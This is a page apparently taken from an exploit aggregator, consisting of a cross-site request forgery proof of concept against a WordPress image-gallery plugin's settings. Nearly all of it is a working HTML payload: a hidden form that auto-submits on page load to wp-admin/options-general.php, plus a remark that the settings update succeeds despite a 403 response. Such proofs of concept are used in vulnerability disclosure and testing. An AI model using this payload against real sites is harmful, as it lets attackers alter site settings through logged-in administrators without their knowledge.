Share
## https://sploitus.com/exploit?id=WPEX-ID:49B3A8CB-F606-4CF7-80EC-BFDAFD74E848
<html>
<body>
<form action="http://WP/wp-admin/options-general.php" method="POST">
<input type="hidden" name="bar_size" value="anything" />
<input type="hidden" name="indexIndicatorSep" value="anything" />
<input type="hidden" name="loop_images" value="1" />
<input type="hidden" name="show_close_element" value="1" />
<input type="hidden" name="show_fullscreen_element" value="1" />
<input type="hidden" name="show_zoom_element" value="1" />
<input type="hidden" name="show_share_element" value="1" />
<input type="hidden" name="show_counter_element" value="1" />
<input type="hidden" name="show_arrow_element" value="1" />
<input type="hidden" name="show_preloader_element" value="1" />
<input type="hidden" name="tap_to_toggle_controls" value="1" />
<input type="hidden" name="photoswipe_save" value="Save Settings" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
the response of the request above is 403, but the settings update still happens